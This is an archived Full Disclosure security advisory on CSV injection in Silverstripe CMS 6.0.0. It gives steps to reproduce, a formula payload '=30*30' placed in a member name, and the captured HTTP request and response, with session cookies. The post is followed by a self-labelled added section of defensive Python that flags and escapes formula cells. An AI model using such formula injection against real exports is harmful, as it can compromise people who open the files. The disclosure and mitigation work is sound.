
Full Disclosure mailing list archives
CSV Injection - silverstripecmsv6.0.0
From: Andrey Stoykov <mwebsec () gmail com>
Date: Sat, 23 Aug 2025 15:14:20 +0100
# Exploit Title: [Vuln] - silverstripecmsv6.0.0
# Date: 08/2025
# Exploit Author: Andrey Stoykov
# Version: 6.0.0
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/2025/08/friday-fun-pentest-series-40-csv.html

CSV Injection #1:

Steps to Reproduce:
- Log in and visit "Security" > "Add Member" > "First Name" and enter the payload =30*30
- Then visit "Reports" > "Users, Groups and Permissions" > "Export as CSV"
- The payload is evaluated as a formula when the exported CSV file is opened in a spreadsheet application

// HTTP POST Request

POST /admin/security/users/EditForm/field/users/item/new/ItemEditForm HTTP/1.1
Host: demo.silverstripe.org
Cookie: visid_incap_3234715=JSWe9qhQRzmcfQM+hQYKo520oGgAAAAAQUIPAAAAAAA1lIwlny722Bqz5Fh2HjIm; incap_ses_1578_3234715=pDp6BF9HRASFHbw47i7mFZ20oGgAAAAAwGUa55EbwGNyrjzYe9Tvtg==; _ga=GA1.2.147977582.1755362464; _gid=GA1.2.845482632.1755362464; cms-panel-collapsed-cms-menu=false; PHPSESSID=haijog8p8qokn0uf46rkvvfsv4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
[...]

FirstName=%3D30*30&Surname=test&Email=test%40example.com&Password%5B_Password%5D=&Password%5B_ConfirmPassword%5D=&Locale=en_US&FailedLoginCount=&SecurityID=8f151871365766eb90355f98c745a93ae8f5205c&action_doSave=1&BackURL=https%3A%2F%2Fdemo.silverstripe.org%2Fadmin%2Fsecurity

// HTTP Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 16 Aug 2025 17:02:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
x-status: Saved%20Member%20%22test%2C%20%3D30%2A30%22%20successfully.
x-controllerurl: admin/security/users/EditForm/field/users/item/510
x-pjax: CurrentForm,Breadcrumbs,ValidationResult
x-controller: SilverStripe\Admin\SecurityAdmin
x-title: Silverstripe+-+Security
x-frame-options: SAMEORIGIN
vary: X-Requested-With
[...]
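The root cause described above is that a user-supplied field (FirstName) is written verbatim into a CSV export, so a value beginning with a formula trigger is evaluated by the spreadsheet that opens the file. The following is an added example, not code from the advisory or from the Silverstripe project, showing the defender-side handling in Python: a detector that flags formula-like values in a submitted form body (using the FirstName value from the request shown above as constructed sample input), and an export routine that neutralizes every cell before it reaches the CSV. The field names and the export layout are assumptions made for the example.

```python
import csv
import io
from urllib.parse import parse_qs

# Characters that spreadsheet applications treat as the start of a formula.
# Tab and carriage return are included because some applications strip a
# leading control character before deciding whether the cell is a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if the value would be interpreted as a formula when the CSV is opened."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value: str) -> str:
    """Return a value that is safe to place in a CSV cell.

    Formula-like values get a leading single quote, which spreadsheet
    applications treat as "render the rest as literal text". The quote
    is visible in the cell; that is the accepted trade-off for exports.
    Commas and double quotes are handled by the csv module's quoting.
    """
    if is_formula_like(value):
        return "'" + value
    return value


def export_members_csv(rows, fieldnames):
    """Write rows (list of dicts) as CSV text with every cell neutralized.

    Neutralization happens at the export boundary, so it also covers values
    that were stored before any input-side validation existed.
    """
    buf = io.StringIO()
    writer = csv.DictWriter(
        buf, fieldnames=fieldnames, quoting=csv.QUOTE_ALL, lineterminator="\n"
    )
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(str(row.get(k, ""))) for k in fieldnames})
    return buf.getvalue()


def flag_formula_fields(form_body: str) -> dict:
    """Detection helper for an application/x-www-form-urlencoded body.

    Returns {field: decoded_value} for every field whose decoded value is
    formula-like; useful for logging or alerting on member-edit requests.
    """
    parsed = parse_qs(form_body, keep_blank_values=True)
    return {k: v[0] for k, v in parsed.items() if v and is_formula_like(v[0])}


# Constructed sample: the first three fields of the request body quoted in
# the advisory. %3D decodes to "=", so FirstName becomes "=30*30".
SAMPLE_BODY = "FirstName=%3D30*30&Surname=test&Email=test%40example.com"

if __name__ == "__main__":
    flagged = flag_formula_fields(SAMPLE_BODY)
    print("formula-like fields:", flagged)
    members = [{"FirstName": "=30*30", "Surname": "test", "Email": "test@example.com"},
               {"FirstName": "Alice", "Surname": "Smith", "Email": "alice@example.com"}]
    print(export_members_csv(members, ["FirstName", "Surname", "Email"]))
```

The leading-quote approach is the common mitigation for CSV exports, but it is lossy for legitimate values that begin with "-" or "+" (negative numbers, international phone numbers), so an export that must preserve such values exactly should instead neutralize only the fields that are free text, or offer a format such as XLSX where cell types are explicit.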
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/